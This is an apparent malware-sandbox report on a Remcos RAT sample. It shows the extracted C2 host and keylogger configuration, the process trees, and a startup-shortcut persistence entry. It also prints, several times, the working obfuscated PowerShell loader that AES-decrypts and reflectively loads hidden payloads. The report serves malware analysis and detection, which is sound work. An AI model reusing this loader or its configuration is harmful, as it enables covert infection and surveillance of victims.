remcos | 5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 13:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

03042024_2143_Install.js
Size

678KB
MD5

550a5d0ef3c596a05e47361981c0fd17
SHA1

ce47883964e4ca68c30f3dfdc5b8cfde416b4dec
SHA256

5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845
SHA512

d68416e4abc50a5d8454f17feeda5a975004180283e06455fb8bc65d4a6c7e4ad3e089747e2a460f0ed050c0c0d4ebf3ef34522190a240378ae91dcdc78513c8
SSDEEP

768:DkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLpkLD:DCCCCCCCCCCCCCCCCCCK

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

bignight.net:3363

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1XSDBO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 22 IoCs

Processes:

wscript.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
4	3992	wscript.exe
10	2824	powershell.exe
21	5052	powershell.exe
27	1724	powershell.exe
28	1888	powershell.exe
32	4980	powershell.exe
35	3780	powershell.exe
36	2104	powershell.exe
39	2928	powershell.exe
51	3096	powershell.exe
52	4880	powershell.exe
53	5036	powershell.exe
54	1888	powershell.exe
60	3908	powershell.exe
62	1944	powershell.exe
63	5012	powershell.exe
67	2452	powershell.exe
68	2804	powershell.exe
69	1276	powershell.exe
70	1088	powershell.exe
72	3600	powershell.exe
75	3600	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk	powershell.exe

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
2824	powershell.exe
2824	powershell.exe
5052	powershell.exe
5052	powershell.exe
5100	powershell.exe
5100	powershell.exe
1724	powershell.exe
1724	powershell.exe
3636	powershell.exe
3636	powershell.exe
1112	powershell.exe
1112	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
1888	powershell.exe
1888	powershell.exe
1888	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
3780	powershell.exe
3780	powershell.exe
4064	powershell.exe
4064	powershell.exe
3780	powershell.exe
4064	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
2104	powershell.exe
2104	powershell.exe
3900	powershell.exe
3900	powershell.exe
2104	powershell.exe
3900	powershell.exe
2840	powershell.exe
2840	powershell.exe
2840	powershell.exe
2928	powershell.exe
2928	powershell.exe
4092	powershell.exe
4092	powershell.exe
2928	powershell.exe
4092	powershell.exe
2800	powershell.exe
2800	powershell.exe
2800	powershell.exe
4808	powershell.exe
4808	powershell.exe
3096	powershell.exe
3096	powershell.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeDebugPrivilege	3908	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

3600 powershell.exe

pid	process
3600	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.exepowershell.execmd.execmd.exepowershell.execmd.execmd.exepowershell.exepowershell.exepowershell.execmd.execmd.exepowershell.exepowershell.execmd.execmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 3992 wrote to memory of 2824	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 2824	3992	wscript.exe	powershell.exe
PID 2824 wrote to memory of 4864	2824	powershell.exe	cmd.exe
PID 2824 wrote to memory of 4864	2824	powershell.exe	cmd.exe
PID 4864 wrote to memory of 2004	4864	cmd.exe	cmd.exe
PID 4864 wrote to memory of 2004	4864	cmd.exe	cmd.exe
PID 2004 wrote to memory of 1984	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 1984	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 5100	2004	cmd.exe	powershell.exe
PID 2004 wrote to memory of 5100	2004	cmd.exe	powershell.exe
PID 2004 wrote to memory of 5100	2004	cmd.exe	powershell.exe
PID 3992 wrote to memory of 5052	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 5052	3992	wscript.exe	powershell.exe
PID 5052 wrote to memory of 5024	5052	powershell.exe	cmd.exe
PID 5052 wrote to memory of 5024	5052	powershell.exe	cmd.exe
PID 5024 wrote to memory of 1344	5024	cmd.exe	cmd.exe
PID 5024 wrote to memory of 1344	5024	cmd.exe	cmd.exe
PID 3992 wrote to memory of 1724	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 1724	3992	wscript.exe	powershell.exe
PID 1344 wrote to memory of 4836	1344	cmd.exe	cmd.exe
PID 1344 wrote to memory of 4836	1344	cmd.exe	cmd.exe
PID 1344 wrote to memory of 3636	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 3636	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 3636	1344	cmd.exe	powershell.exe
PID 5100 wrote to memory of 1112	5100	powershell.exe	powershell.exe
PID 5100 wrote to memory of 1112	5100	powershell.exe	powershell.exe
PID 5100 wrote to memory of 1112	5100	powershell.exe	powershell.exe
PID 3636 wrote to memory of 3632	3636	powershell.exe	powershell.exe
PID 3636 wrote to memory of 3632	3636	powershell.exe	powershell.exe
PID 3636 wrote to memory of 3632	3636	powershell.exe	powershell.exe
PID 1724 wrote to memory of 3764	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3764	1724	powershell.exe	cmd.exe
PID 3992 wrote to memory of 1888	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 1888	3992	wscript.exe	powershell.exe
PID 3764 wrote to memory of 2828	3764	cmd.exe	cmd.exe
PID 3764 wrote to memory of 2828	3764	cmd.exe	cmd.exe
PID 2828 wrote to memory of 216	2828	cmd.exe	cmd.exe
PID 2828 wrote to memory of 216	2828	cmd.exe	cmd.exe
PID 2828 wrote to memory of 1572	2828	cmd.exe	powershell.exe
PID 2828 wrote to memory of 1572	2828	cmd.exe	powershell.exe
PID 2828 wrote to memory of 1572	2828	cmd.exe	powershell.exe
PID 1572 wrote to memory of 4272	1572	powershell.exe	powershell.exe
PID 1572 wrote to memory of 4272	1572	powershell.exe	powershell.exe
PID 1572 wrote to memory of 4272	1572	powershell.exe	powershell.exe
PID 1888 wrote to memory of 4864	1888	powershell.exe	cmd.exe
PID 1888 wrote to memory of 4864	1888	powershell.exe	cmd.exe
PID 4864 wrote to memory of 2292	4864	cmd.exe	cmd.exe
PID 4864 wrote to memory of 2292	4864	cmd.exe	cmd.exe
PID 3992 wrote to memory of 4980	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 4980	3992	wscript.exe	powershell.exe
PID 2292 wrote to memory of 4040	2292	cmd.exe	cmd.exe
PID 2292 wrote to memory of 4040	2292	cmd.exe	cmd.exe
PID 2292 wrote to memory of 4836	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 4836	2292	cmd.exe	powershell.exe
PID 2292 wrote to memory of 4836	2292	cmd.exe	powershell.exe
PID 4836 wrote to memory of 4400	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4400	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 4400	4836	powershell.exe	powershell.exe
PID 4980 wrote to memory of 4716	4980	powershell.exe	cmd.exe
PID 4980 wrote to memory of 4716	4980	powershell.exe	cmd.exe
PID 4716 wrote to memory of 1464	4716	cmd.exe	cmd.exe
PID 4716 wrote to memory of 1464	4716	cmd.exe	cmd.exe
PID 3992 wrote to memory of 3780	3992	wscript.exe	powershell.exe
PID 3992 wrote to memory of 3780	3992	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:1984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:4836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD 